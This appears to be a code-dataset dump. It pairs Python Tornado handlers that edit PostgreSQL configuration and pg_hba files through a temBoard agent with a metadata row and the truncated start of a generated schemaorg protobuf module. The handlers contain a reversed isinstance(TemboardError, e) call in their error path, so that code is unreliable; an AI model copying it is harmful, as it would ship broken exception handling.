return HTMLAsyncResult(http_code=401, redirection="/login")
code = e.code
else:
code = 500
return HTMLAsyncResult(
http_code=code,
template_file='error.html',
data={
'nav': True,
'role': role,
'instance': instance,
'code': e.code,
'error': e.message
})
@tornado.web.asynchronous
def get(self, agent_address, agent_port, category=None):
run_background(self.get_configuration, self.async_callback,
(agent_address, agent_port, category))
def post_configuration(self, agent_address, agent_port, category=None):
try:
self.logger.info("Posting configuration.")
instance = None
role = None
self.load_auth_cookie()
self.start_db_session()
role = self.current_user
if not role:
raise TemboardUIError(302, "Current role unknown.")
instance = get_instance(self.db_session, agent_address, agent_port)
if not instance:
raise TemboardUIError(404, "Instance not found.")
if __name__ not in [plugin.plugin_name
for plugin in instance.plugins]:
raise TemboardUIError(408, "Plugin not active.")
self.db_session.expunge_all()
self.db_session.commit()
self.db_session.close()
xsession = self.get_secure_cookie(
"temboard_%s_%s" %
(instance.agent_address, instance.agent_port))
if not xsession:
raise TemboardUIError(401, "Authentication cookie is missing.")
query_filter = self.get_argument('filter', None, True)
error_code = None
error_message = None
post_settings = self.request.arguments
ret_post = None
settings = {'settings': []}
for setting_name, setting_value in post_settings.iteritems():
# 'filter' is not a setting, just ignore it.
if setting_name == 'filter':
continue
settings['settings'].append({'name': setting_name,
'setting': setting_value[0]})
try:
# Try to send settings to the agent.
ret_post = temboard_post_configuration(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession,
settings)
except TemboardError as e:
error_code = e.code
error_message = e.message
# Get PostgreSQL configuration status: needs restart, reload or is
# fine.
configuration_status = temboard_get_configuration_status(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession)
# Load settings categories.
configuration_cat = temboard_get_configuration_categories(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession)
if category is None:
category = tornado.escape.url_escape(
configuration_cat['categories'][0])
# Load settings depending on the current category or the filter
# value.
url = tornado.escape.url_escape(
tornado.escape.url_unescape(category))
configuration_data = temboard_get_configuration(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession,
url,
query_filter)
self.logger.info("Done.")
return HTMLAsyncResult(
http_code=200,
template_path=self.template_path,
template_file='configuration.html',
data={
'nav': True,
'role': role,
'instance': instance,
'plugin': 'pgconf',
'data': configuration_data,
'xsession': xsession,
'current_cat': tornado.escape.url_unescape(category),
'configuration_categories': configuration_cat,
'configuration_status': configuration_status,
'error_code': error_code,
'error_message': error_message,
'ret_post': ret_post,
'query_filter': query_filter
})
except (TemboardUIError, TemboardError, Exception) as e:
self.logger.exception(str(e))
self.logger.info("Failed.")
try:
self.db_session.expunge_all()
self.db_session.rollback()
self.db_session.close()
except Exception:
pass
if (isinstance(e, TemboardUIError) or
isinstance(e, TemboardError)):
if e.code == 401:
return HTMLAsyncResult(
http_code=401,
redirection="/server/%s/%s/login" %
(agent_address, agent_port))
elif e.code == 302:
return HTMLAsyncResult(http_code=401, redirection="/login")
code = e.code
else:
code = 500
return HTMLAsyncResult(
http_code=code,
template_file='error.html',
data={
'nav': True,
'role': role,
'instance': instance,
'code': e.code,
'error': e.message
})
@tornado.web.asynchronous
def post(self, agent_address, agent_port, category=None):
run_background(self.post_configuration, self.async_callback,
(agent_address, agent_port, category))
class ConfigurationFileHandler(BaseHandler):
def get_configuration_file(self, agent_address, agent_port):
try:
self.logger.info("Getting configuration (file).")
instance = None
role = None
self.load_auth_cookie()
self.start_db_session()
role = self.current_user
if not role:
raise TemboardUIError(302, "Current role unknown.")
instance = get_instance(self.db_session, agent_address, agent_port)
if not instance:
raise TemboardUIError(404, "Instance not found.")
if __name__ not in [plugin.plugin_name
for plugin in instance.plugins]:
raise TemboardUIError(408, "Plugin not active.")
self.db_session.expunge_all()
self.db_session.commit()
self.db_session.close()
xsession = self.get_secure_cookie(
"temboard_%s_%s" %
(instance.agent_address, instance.agent_port))
if not xsession:
raise TemboardUIError(401, "Authentication cookie is missing.")
# Load file content.
file_content = temboard_get_file_content(
self.ssl_ca_cert_file,
self.file_type,
instance.agent_address,
instance.agent_port,
xsession)
self.logger.info("Done.")
return HTMLAsyncResult(
http_code=200,
template_path=self.template_path,
template_file='edit_file.html',
data={
'nav': True,
'role': role,
'instance': instance,
'plugin': 'pgconf',
'file_type': self.file_type,
'file_content': file_content,
'xsession': xsession
})
except (TemboardUIError, TemboardError, Exception) as e:
self.logger.exception(str(e))
self.logger.info("Failed.")
try:
self.db_session.expunge_all()
self.db_session.rollback()
self.db_session.close()
except Exception:
pass
if (isinstance(e, TemboardUIError) or
isinstance(e, TemboardError)):
if e.code == 401:
return HTMLAsyncResult(
http_code=401,
redirection="/server/%s/%s/login" %
(agent_address, agent_port))
elif e.code == 302:
return HTMLAsyncResult(http_code=401, redirection="/login")
code = e.code
else:
code = 500
return HTMLAsyncResult(
http_code=code,
template_file='error.html',
data={
'nav': True,
'role': role,
'instance': instance,
'code': e.code,
'error': e.message
})
@tornado.web.asynchronous
def get(self, agent_address, agent_port):
run_background(self.get_configuration_file, self.async_callback,
(agent_address, agent_port))
def post_configuration_file(self, agent_address, agent_port):
error_code = None
error_message = None
ret_post = None
try:
self.logger.info("Posting configuration (file).")
instance = None
role = None
self.load_auth_cookie()
self.start_db_session()
role = self.current_user
if not role:
raise TemboardUIError(302, "Current role unknown.")
instance = get_instance(self.db_session, agent_address, agent_port)
if not instance:
raise TemboardUIError(404, "Instance not found.")
if __name__ not in [plugin.plugin_name
for plugin in instance.plugins]:
raise TemboardUIError(408, "Plugin not active.")
self.db_session.expunge_all()
self.db_session.commit()
self.db_session.close()
xsession = self.get_secure_cookie(
"temboard_%s_%s" %
(instance.agent_address, instance.agent_port))
if not xsession:
raise TemboardUIError(401, "Authentication cookie is missing.")
try:
# Send file content ..
ret_post = temboard_post_file_content(
self.ssl_ca_cert_file,
self.file_type,
instance.agent_address,
instance.agent_port,
xsession,
{
'content': self.request.arguments['content'][0],
'new_version': True
}
)
# .. and reload configuration.
ret_post = temboard_post_administration_control(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession,
{'action': 'reload'})
except (TemboardError, Exception) as e:
self.logger.exception(str(e))
if isinstance(TemboardError, e):
error_code = e.code
error_message = e.message
else:
error_code = 500
error_message = "Internale error."
# Load file content.
file_content = temboard_get_file_content(
self.ssl_ca_cert_file,
self.file_type,
instance.agent_address,
instance.agent_port,
xsession)
self.logger.info("Done.")
return HTMLAsyncResult(
http_code=200,
template_path=self.template_path,
template_file='edit_file.html',
data={
'nav': True,
'role': role,
'instance': instance,
'plugin': 'pgconf',
'file_type': self.file_type,
'file_content': file_content,
'error_code': error_code,
'error_message': error_message,
'xsession': xsession,
'ret_post': ret_post
})
except (TemboardUIError, TemboardError, Exception) as e:
self.logger.exception(str(e))
self.logger.info("Failed.")
try:
self.db_session.expunge_all()
self.db_session.rollback()
self.db_session.close()
except Exception:
pass
if (isinstance(e, TemboardUIError) or
isinstance(e, TemboardError)):
if e.code == 401:
return HTMLAsyncResult(
http_code=401,
redirection="/server/%s/%s/login" %
(agent_address, agent_port))
elif e.code == 302:
return HTMLAsyncResult(http_code=401, redirection="/login")
code = e.code
else:
code = 500
return HTMLAsyncResult(
http_code=code,
template_file='error.html',
data={
'nav': True,
'role': role,
'instance': instance,
'code': e.code,
'error': e.message
})
@tornado.web.asynchronous
def post(self, agent_address, agent_port):
run_background(self.post_configuration_file, self.async_callback,
(agent_address, agent_port))
class ConfigurationFileVersioningHandler(BaseHandler):
def check_etag_header(_):
"""
This is required because we don't want to return a 304 HTTP code when
clients send etag header (like jquery does on .load() calls).
"""
return False
def get_configuration_file(self, agent_address, agent_port):
try:
self.logger.info("Getting configuration (file).")
instance = None
role = None
self.load_auth_cookie()
self.start_db_session()
mode = self.get_argument('mode', None)
version = self.get_argument('version', None)
role = self.current_user
if not role:
raise TemboardUIError(302, "Current role unknown.")
if mode is None and len(self.available_modes) > 0:
mode = self.available_modes[0]
if not (mode in self.available_modes):
raise TemboardUIError(404, "Editing mode not available.")
instance = get_instance(self.db_session, agent_address, agent_port)
if not instance:
raise TemboardUIError(404, "Instance not found.")
if __name__ not in [plugin.plugin_name
for plugin in instance.plugins]:
raise TemboardUIError(408, "Plugin not active.")
self.db_session.expunge_all()
self.db_session.commit()
self.db_session.close()
xsession = self.get_secure_cookie(
"temboard_%s_%s" %
(instance.agent_address, instance.agent_port))
if not xsession:
raise TemboardUIError(401, "Authentication cookie is missing.")
file_versions = temboard_get_conf_file_versions(
self.ssl_ca_cert_file,
self.file_type,
instance.agent_address,
instance.agent_port,
xsession)
if mode == 'raw':
# Load file content.
conf_file_raw = temboard_get_conf_file_raw(
self.ssl_ca_cert_file,
self.file_type,
version,
instance.agent_address,
instance.agent_port,
xsession)
self.logger.info("Done.")
return HTMLAsyncResult(
http_code=200,
template_path=self.template_path,
template_file='edit_conf_file_raw.html',
data={
'nav': True,
'role': role,
'instance': instance,
'plugin': 'pgconf',
'file_versions': file_versions,
'file_type': self.file_type,
'conf_file_raw': conf_file_raw,
'xsession': xsession
})
if mode == 'advanced':
hba_options = None
if self.file_type == 'hba':
hba_options = temboard_get_hba_options(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession)
conf_file = temboard_get_conf_file(
self.ssl_ca_cert_file,
self.file_type,
version,
instance.agent_address,
instance.agent_port,
xsession)
self.logger.info("Done.")
return HTMLAsyncResult(
http_code=200,
template_path=self.template_path,
template_file='edit_conf_file_advanced.html',
data={
'nav': True,
'role': role,
'instance': instance,
'plugin': 'pgconf',
'file_versions': file_versions,
'file_type': self.file_type,
'conf_file': conf_file,
'hba_options': hba_options,
'xsession': xsession
})
except (TemboardUIError, TemboardError, Exception) as e:
self.logger.exception(str(e))
self.logger.info("Failed.")
try:
self.db_session.expunge_all()
self.db_session.rollback()
self.db_session.close()
except Exception:
pass
if (isinstance(e, TemboardUIError) or
isinstance(e, TemboardError)):
if e.code == 401:
return HTMLAsyncResult(
http_code=401,
redirection="/server/%s/%s/login" %
(agent_address, agent_port))
elif e.code == 302:
return HTMLAsyncResult(http_code=401, redirection="/login")
code = e.code
else:
code = 500
return HTMLAsyncResult(
http_code=code,
template_file='error.html',
data={
'nav': True,
'role': role,
'instance': instance,
'code': e.code,
'error': e.message
})
@tornado.web.asynchronous
def get(self, agent_address, agent_port):
run_background(self.get_configuration_file, self.async_callback,
(agent_address, agent_port))
def post_configuration_file(self, agent_address, agent_port):
error_code = None
error_message = None
ret_post = None
try:
self.logger.info("Posting configuration (file).")
instance = None
role = None
self.load_auth_cookie()
self.start_db_session()
role = self.current_user
if not role:
raise TemboardUIError(302, "Current role unknown.")
instance = get_instance(self.db_session, agent_address, agent_port)
if not instance:
raise TemboardUIError(404, "Instance not found.")
if __name__ not in [plugin.plugin_name
for plugin in instance.plugins]:
raise TemboardUIError(408, "Plugin not active.")
self.db_session.expunge_all()
self.db_session.commit()
self.db_session.close()
xsession = self.get_secure_cookie(
"temboard_%s_%s" %
(instance.agent_address, instance.agent_port))
if not xsession:
raise TemboardUIError(401, "Authentication cookie is missing.")
try:
# Send file content ..
ret_post = temboard_post_file_content(
self.ssl_ca_cert_file,
self.file_type,
instance.agent_address,
instance.agent_port,
xsession,
{
'content': self.request.arguments['content'][0],
'new_version': True
}
)
# .. and reload configuration.
ret_post = temboard_post_administration_control(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession,
{'action': 'reload'})
except (TemboardError, Exception) as e:
self.logger.exception(str(e))
if isinstance(TemboardError, e):
error_code = e.code
error_message = e.message
else:
error_code = 500
error_message = "Internale error."
# Load file content.
file_content = temboard_get_file_content(
self.ssl_ca_cert_file,
self.file_type,
instance.agent_address,
instance.agent_port,
xsession)
self.logger.info("Done.")
return HTMLAsyncResult(
http_code=200,
template_path=self.template_path,
template_file='edit_file.html',
data={
'nav': True,
'role': role,
'instance': instance,
'plugin': 'pgconf',
'file_type': self.file_type,
'file_content': file_content,
'error_code': error_code,
'error_message': error_message,
'xsession': xsession,
'ret_post': ret_post
})
except (TemboardUIError, TemboardError, Exception) as e:
self.logger.exception(str(e))
self.logger.info("Failed.")
try:
self.db_session.expunge_all()
self.db_session.rollback()
self.db_session.close()
except Exception:
pass
if (isinstance(e, TemboardUIError) or
isinstance(e, TemboardError)):
if e.code == 401:
return HTMLAsyncResult(
http_code=401,
redirection="/server/%s/%s/login" %
(agent_address, agent_port))
elif e.code == 302:
return HTMLAsyncResult(http_code=401, redirection="/login")
code = e.code
else:
code = 500
return HTMLAsyncResult(
http_code=code,
template_file='error.html',
data={
'nav': True,
'role': role,
'instance': instance,
'code': e.code,
'error': e.message
})
@tornado.web.asynchronous
def post(self, agent_address, agent_port):
run_background(self.post_configuration_file, self.async_callback,
(agent_address, agent_port))
class HBAHandler(ConfigurationFileVersioningHandler):
file_type = 'hba'
available_modes = ['advanced', 'raw']
class PGIdentHandler(ConfigurationFileHandler):
file_type = 'pg_ident'
"""
Proxy Handlers
"""
class AdminControlProxyHandler(JsonHandler):
""" /administration/control JSON handler """
def post_control(self, agent_address, agent_port):
try:
self.logger.info("Posting control (proxy).")
instance = None
role = None
self.load_auth_cookie()
self.start_db_session()
role = self.current_user
if not role:
raise TemboardUIError(302, "Current role unknown.")
instance = get_instance(self.db_session, agent_address, agent_port)
if not instance:
raise TemboardUIError(404, "Instance not found.")
if __name__ not in [plugin.plugin_name
for plugin in instance.plugins]:
raise TemboardUIError(408, "Plugin not active.")
self.db_session.expunge_all()
self.db_session.commit()
self.db_session.close()
xsession = self.get_secure_cookie(
"temboard_%s_%s" %
(instance.agent_address, instance.agent_port))
if not xsession:
raise TemboardUIError(401, "Authentication cookie is missing.")
data = temboard_post_administration_control(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession,
tornado.escape.json_decode(self.request.body))
self.logger.info("Done.")
return JSONAsyncResult(http_code=200, data=data)
except (TemboardUIError, TemboardError, Exception) as e:
self.logger.exception(str(e))
self.logger.info("Failed.")
try:
self.db_session.close()
except Exception:
pass
if (isinstance(e, TemboardUIError) or
isinstance(e, TemboardError)):
return JSONAsyncResult(http_code=e.code,
data={'error': e.message})
else:
return JSONAsyncResult(http_code=500,
data={'error': e.message})
@tornado.web.asynchronous
def post(self, agent_address, agent_port):
run_background(self.post_control, self.async_callback,
(agent_address, agent_port))
class ConfigurationProxyHandler(JsonHandler):
""" /pgconf/configuration JSON handler """
def post_configuration(self, agent_address, agent_port):
try:
self.logger.info("Posting configuration (proxy).")
instance = None
role = None
self.load_auth_cookie()
self.start_db_session()
role = self.current_user
if not role:
raise TemboardUIError(302, "Current role unknown.")
instance = get_instance(self.db_session, agent_address, agent_port)
if not instance:
raise TemboardUIError(404, "Instance not found.")
if __name__ not in [plugin.plugin_name
for plugin in instance.plugins]:
raise TemboardUIError(408, "Plugin not active.")
self.db_session.expunge_all()
self.db_session.commit()
self.db_session.close()
xsession = self.get_secure_cookie(
"temboard_%s_%s" %
(instance.agent_address, instance.agent_port))
if not xsession:
raise TemboardUIError(401, "Authentication cookie is missing.")
data = temboard_post_configuration(
self.ssl_ca_cert_file,
agent_address,
agent_port,
xsession,
tornado.escape.json_decode(self.request.body))
self.logger.info("Done.")
return JSONAsyncResult(http_code=200, data=data)
except (TemboardUIError, TemboardError, Exception) as e:
self.logger.exception(str(e))
self.logger.info("Failed.")
try:
self.db_session.close()
except Exception:
pass
if (isinstance(e, TemboardUIError) or
isinstance(e, TemboardError)):
return JSONAsyncResult(http_code=e.code,
data={'error': e.message})
else:
return JSONAsyncResult(http_code=500,
data={'error': e.message})
@tornado.web.asynchronous
def post(self, agent_address, agent_port):
run_background(self.post_configuration, self.async_callback,
(agent_address, agent_port))
class HBAOptionsProxyHandler(JsonHandler):
def get_hba_options(self, agent_address, agent_port):
try:
self.logger.info("Getting HBA options (proxy).")
role = None
instance = None
self.load_auth_cookie()
self.start_db_session()
role = self.current_user
if not role:
raise TemboardUIError(302, "Current role unknown.")
instance = get_instance(self.db_session, agent_address, agent_port)
if not instance:
raise TemboardUIError(404, "Instance not found.")
if __name__ not in [plugin.plugin_name
for plugin in instance.plugins]:
raise TemboardUIError(408, "Plugin not activated.")
self.db_session.expunge_all()
self.db_session.commit()
self.db_session.close()
xsession = self.request.headers.get('X-Session')
if not xsession:
raise TemboardUIError(401, 'X-Session header missing')
hba_options = temboard_get_hba_options(
self.ssl_ca_cert_file, instance.agent_address,
instance.agent_port, xsession)
self.logger.info("Done.")
return JSONAsyncResult(http_code=200, data=hba_options)
except (TemboardUIError, TemboardError, Exception) as e:
self.logger.exception(str(e))
self.logger.info("Failed.")
try:
self.db_session.close()
except Exception:
pass
if (isinstance(e, TemboardUIError) or
isinstance(e, TemboardError)):
return JSONAsyncResult(http_code=e.code,
data={'error': e.message})
else:
return JSONAsyncResult(http_code=500,
data={'error': e.message})
@tornado.web.asynchronous
def get(self, agent_address, agent_port):
run_background(self.get_hba_options, self.async_callback,
(agent_address, agent_port))
class HBAProxyHandler(JsonHandler):
def post_hba(self, agent_address, agent_port):
try:
self.logger.info("Posting HBA (proxy).")
instance = None
role = None
self.load_auth_cookie()
self.start_db_session()
role = self.current_user
if not role:
raise TemboardUIError(302, "Current role unknown.")
instance = get_instance(self.db_session, agent_address, agent_port)
if not instance:
raise TemboardUIError(404, "Instance not found.")
if __name__ not in [plugin.plugin_name
for plugin in instance.plugins]:
raise TemboardUIError(408, "Plugin not active.")
self.db_session.expunge_all()
self.db_session.commit()
self.db_session.close()
xsession = self.get_secure_cookie(
"temboard_%s_%s" %
(instance.agent_address, instance.agent_port))
if not xsession:
raise TemboardUIError(401, "Authentication cookie is missing.")
data = temboard_post_conf_file(
self.ssl_ca_cert_file,
'hba',
instance.agent_address,
instance.agent_port,
xsession,
tornado.escape.json_decode(self.request.body))
# And reload postgresql configuration.
temboard_post_administration_control(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession,
{'action': 'reload'})
self.logger.info("Done.")
return JSONAsyncResult(http_code=200, data=data)
except (TemboardUIError, TemboardError, Exception) as e:
self.logger.exception(str(e))
self.logger.info("Failed.")
try:
self.db_session.close()
except Exception:
pass
if (isinstance(e, TemboardUIError) or
isinstance(e, TemboardError)):
return JSONAsyncResult(http_code=e.code,
data={'error': e.message})
else:
return JSONAsyncResult(http_code=500,
data={'error': e.message})
@tornado.web.asynchronous
def post(self, agent_address, agent_port):
run_background(self.post_hba, self.async_callback,
(agent_address, agent_port))
class HBADeleteProxyHandler(JsonHandler):
def delete_hba(self, agent_address, agent_port):
try:
self.logger.info("Deleting HBA (proxy).")
instance = None
role = None
self.load_auth_cookie()
self.start_db_session()
role = self.current_user
if not role:
raise TemboardUIError(302, "Current role unknown.")
instance = get_instance(self.db_session, agent_address, agent_port)
if not instance:
raise TemboardUIError(404, "Instance not found.")
if __name__ not in [plugin.plugin_name
for plugin in instance.plugins]:
raise TemboardUIError(408, "Plugin not active.")
self.db_session.expunge_all()
self.db_session.commit()
self.db_session.close()
xsession = self.get_secure_cookie(
"temboard_%s_%s" %
(instance.agent_address, instance.agent_port))
if not xsession:
raise TemboardUIError(401, "Authentication cookie is missing.")
res = temboard_delete_hba_version(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession,
self.get_argument('version', None))
self.logger.info("Done.")
return JSONAsyncResult(http_code=200, data=res)
except (TemboardUIError, TemboardError, Exception) as e:
self.logger.exception(str(e))
self.logger.info("Failed.")
try:
self.db_session.close()
except Exception:
pass
if (isinstance(e, TemboardUIError) or
isinstance(e, TemboardError)):
return JSONAsyncResult(http_code=e.code,
data={'error': e.message})
else:
return JSONAsyncResult(http_code=500,
data={'error': e.message})
@tornado.web.asynchronous
def get(self, agent_address, agent_port):
run_background(self.delete_hba, self.async_callback,
(agent_address, agent_port))
| 40.503552 | 79 | 0.488872 | 3,941 | 45,607 | 5.424512 | 0.055316 | 0.047713 | 0.040743 | 0.050098 | 0.87272 | 0.868556 | 0.862054 | 0.857377 | 0.83207 | 0.824726 | 0 | 0.012639 | 0.430986 | 45,607 | 1,125 | 80 | 40.539556 | 0.811144 | 0.009998 | 0 | 0.842365 | 0 | 0 | 0.078498 | 0.011106 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.010837 | 0.007882 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
74777ad128f2bba30abebbe01d8db769119be2a7 | 34,111 | py | Python | SchemaPages/schemapages_pb2.py | asysc2020/schemaorg | c8443e85227502a2c116ad2ae1c6d211e66935b2 | [
"Apache-2.0"
] | 1 | 2018-01-15T12:14:10.000Z | 2018-01-15T12:14:10.000Z | SchemaPages/schemapages_pb2.py | asysc2020/schemaorg | c8443e85227502a2c116ad2ae1c6d211e66935b2 | [
"Apache-2.0"
] | null | null | null | SchemaPages/schemapages_pb2.py | asysc2020/schemaorg | c8443e85227502a2c116ad2ae1c6d211e66935b2 | [
"Apache-2.0"
] | 3 | 2015-10-23T05:18:07.000Z | 2021-11-22T08:54:56.000Z | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: schemapages.proto
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='schemapages.proto',
package='SchemaPages',
syntax='proto2',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x11schemapages.proto\x12\x0bSchemaPages\"\x1e\n\tSuperPath\x12\x11\n\tsuperPath\x18\x01 \x03(\t\"\x97\x02\n\x07SDOTerm\x12\'\n\x08termType\x18\x01 \x02(\x0e\x32\x15.SchemaPages.TermType\x12\x0b\n\x03uri\x18\x02 \x02(\t\x12\r\n\x05label\x18\x04 \x02(\t\x12*\n\nsuperPaths\x18\x06 \x03(\x0b\x32\x16.SchemaPages.SuperPath\x12\x18\n\x10\x61\x63knowledgements\x18\x05 \x03(\t\x12\x0f\n\x07\x63omment\x18\x07 \x02(\t\x12\x13\n\x0b\x65quivalents\x18\x08 \x03(\t\x12\x0f\n\x07pending\x18\t \x02(\x08\x12\x0f\n\x07retired\x18\n \x02(\x08\x12\x14\n\x0csupersededBy\x18\x0b \x01(\t\x12\x12\n\nsupersedes\x18\x0c \x03(\t\x12\x0f\n\x07sources\x18\r \x03(\t\"\xd8\x01\n\x0bSDOBaseType\x12\n\n\x02id\x18\x01 \x02(\t\x12,\n\x0etermdescriptor\x18\x02 \x03(\x0b\x32\x14.SchemaPages.SDOTerm\x12\x12\n\nproperties\x18\x03 \x03(\t\x12\x15\n\rallproperties\x18\x04 \x03(\t\x12\x17\n\x0f\x65xpectedTypeFor\x18\x05 \x03(\t\x12\x1a\n\x12\x65numerationMembers\x18\x06 \x03(\t\x12\x0c\n\x04subs\x18\t \x03(\t\x12\x0e\n\x06supers\x18\n \x03(\t\x12\x11\n\ttermStack\x18\x0b \x03(\t\"\xb8\x01\n\x0bSDOProperty\x12\n\n\x02id\x18\x01 \x02(\t\x12,\n\x0etermdescriptor\x18\x02 \x03(\x0b\x32\x14.SchemaPages.SDOTerm\x12\x16\n\x0e\x64omainIncludes\x18\x03 \x03(\t\x12\x15\n\rrangeIncludes\x18\x04 \x03(\t\x12\x0f\n\x07inverse\x18\x05 \x02(\t\x12\x0c\n\x04subs\x18\x06 \x03(\t\x12\x0e\n\x06supers\x18\x07 \x03(\t\x12\x11\n\ttermStack\x18\x08 \x03(\t\"j\n\x13SDOEnumerationValue\x12\n\n\x02id\x18\x01 \x02(\t\x12,\n\x0etermdescriptor\x18\x02 \x03(\x0b\x32\x14.SchemaPages.SDOTerm\x12\x19\n\x11\x65numerationParent\x18\x03 \x02(\t\"\'\n\x0cSDOReference\x12\n\n\x02id\x18\x01 \x02(\t\x12\x0b\n\x03uri\x18\x02 \x02(\t\"\xa8\x02\n\x13SDOBaseTypeExpanded\x12\n\n\x02id\x18\x01 \x02(\t\x12,\n\x0etermdescriptor\x18\x02 \x03(\x0b\x32\x14.SchemaPages.SDOTerm\x12,\n\nproperties\x18\x03 \x03(\x0b\x32\x18.SchemaPages.SDOProperty\x12\x31\n\x0f\x65xpectedTypeFor\x18\x04 \x03(\x0b\x32\x18.SchemaPages.SDOProperty\x12\x1a\n\x12\x65numerationMembers\x18\x05 \x03(\t\x12\x0c\n\x04subs\x18\x06 \x03(\t\x12\x0e\n\x06supers\x18\x07 \x03(\t\x12<\n\ttermStack\x18\x08 \x03(\x0b\x32).SchemaPages.SDOBaseTypeExpandedPropsOnly\"\x86\x02\n\x1cSDOBaseTypeExpandedPropsOnly\x12\n\n\x02id\x18\x01 \x02(\t\x12,\n\x0etermdescriptor\x18\x02 \x03(\x0b\x32\x14.SchemaPages.SDOTerm\x12,\n\nproperties\x18\x03 \x03(\x0b\x32\x18.SchemaPages.SDOProperty\x12\x31\n\x0f\x65xpectedTypeFor\x18\x04 \x03(\x0b\x32\x18.SchemaPages.SDOProperty\x12\x1a\n\x12\x65numerationMembers\x18\x05 \x03(\t\x12\x0c\n\x04subs\x18\x06 \x03(\t\x12\x0e\n\x06supers\x18\x07 \x03(\t\x12\x11\n\ttermStack\x18\x08 \x03(\t*f\n\x08TermType\x12\x08\n\x04TYPE\x10\x00\x12\x0c\n\x08PROPERTY\x10\x01\x12\x0c\n\x08\x44\x41TATYPE\x10\x02\x12\x0f\n\x0b\x45NUMERATION\x10\x03\x12\x14\n\x10\x45NUMERATIONVALUE\x10\x04\x12\r\n\tREFERENCE\x10\x05'
)
_TERMTYPE = _descriptor.EnumDescriptor(
name='TermType',
full_name='SchemaPages.TermType',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='TYPE', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PROPERTY', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DATATYPE', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ENUMERATION', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ENUMERATIONVALUE', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='REFERENCE', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=1467,
serialized_end=1569,
)
_sym_db.RegisterEnumDescriptor(_TERMTYPE)
TermType = enum_type_wrapper.EnumTypeWrapper(_TERMTYPE)
TYPE = 0
PROPERTY = 1
DATATYPE = 2
ENUMERATION = 3
ENUMERATIONVALUE = 4
REFERENCE = 5
_SUPERPATH = _descriptor.Descriptor(
name='SuperPath',
full_name='SchemaPages.SuperPath',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='superPath', full_name='SchemaPages.SuperPath.superPath', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=34,
serialized_end=64,
)
_SDOTERM = _descriptor.Descriptor(
name='SDOTerm',
full_name='SchemaPages.SDOTerm',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='termType', full_name='SchemaPages.SDOTerm.termType', index=0,
number=1, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='uri', full_name='SchemaPages.SDOTerm.uri', index=1,
number=2, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='label', full_name='SchemaPages.SDOTerm.label', index=2,
number=4, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='superPaths', full_name='SchemaPages.SDOTerm.superPaths', index=3,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='acknowledgements', full_name='SchemaPages.SDOTerm.acknowledgements', index=4,
number=5, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
